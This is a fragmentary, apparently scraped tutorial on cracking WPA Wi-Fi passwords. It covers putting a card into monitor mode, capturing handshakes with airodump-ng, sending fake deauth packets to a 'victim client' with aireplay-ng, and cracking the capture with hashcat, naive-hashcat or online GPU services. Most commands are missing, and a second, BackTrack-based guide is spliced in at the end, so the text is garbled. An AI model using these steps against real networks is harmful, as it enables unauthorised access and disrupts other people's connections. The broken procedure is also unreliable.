sudo apt-get install aircrack-ng
wlan0
but be sure to use the correct name if it differs from this. Next, we will place the interface into monitor mode:iwconfig
. You should now see a new monitor mode interface listed (likely mon0
or wlan0mon
).CH
) number as displayed by airodump-ng
, as we will need them both for the next step.airmon-ng
to monitor traffic on the target network using the channel and bssid values discovered from the previous command.[ WPA handshake: bc:d3:c9:ef:d2:67
at the top right of the screen, just right of the current time.ctrl-c
to quit airodump-ng
. You should see a .cap
file wherever you told airodump-ng
to save the capture (likely called -01.cap
). We will use this capture file to crack the network password. I like to rename this file to reflect the network name we are trying to crack:hashcat
for password cracking. I've created a simple tool that makes hashcat super easy to use called naive-hashcat
. If you don't have access to a GPU, there are various online GPU cracking services that you can use, like GPUHASH.me or OnlineHashCrack. You can also try your hand at CPU cracking with Aircrack-ng.naive-hashcat
(recommended).cap
file to the equivalent hashcat file format .hccapx
. You can do this easily by either uploading the .cap
file to https://hashcat.net/cap2hccapx/ or using the cap2hccapx
tool directly.naive-hashcat
:POT_FILE
::
are the network name and password respectively.hashcat
without naive-hashcat
see this page for info.KEY FOUND!
message in the terminal followed by the plain text version of the network password.airodump-ng
.airodump-ng
to monitor a specific access point (using -c channel --bssid MAC
) until you see a client (STATION
) connected. A connected client look something like this, where is 64:BC:0C:48:97:F7
the client MAC.airodump-ng
running and open a new terminal. We will use the aireplay-ng
command to send fake deauth packets to our victim client, forcing it to reconnect to the network and hopefully grabbing a handshake in the process.airodump-ng
process, and with any luck you should now see something like this at the top right: [ WPA handshake: 9C:5C:8E:C9:AB:C0
. Now that you've captured a handshake you should be ready to crack the network password.wlandump-ng
crunch
to generate 100+GB wordlists on-the-flymacchanger
startx
and press Enter. BackTrack will boot into its graphical interface.wlan0
, but if you have more than one wireless card, or a more unusual networking setup, it may be named something different.wlan0
, execute the following command to put your wireless card into monitor mode:mon0
, like in the screenshot below. Make note of that.airodump-ng wlan0
doesn't work for you, you may want to try the monitor interface instead—e.g., airodump-ng mon0
.)bssid
and moninterface
with the BSSID and monitor interface and you copied down above:mon0
like mine, and your BSSID was 8D:AE:9D:65:1F:B2
(a BSSID I just made up), your command would look like: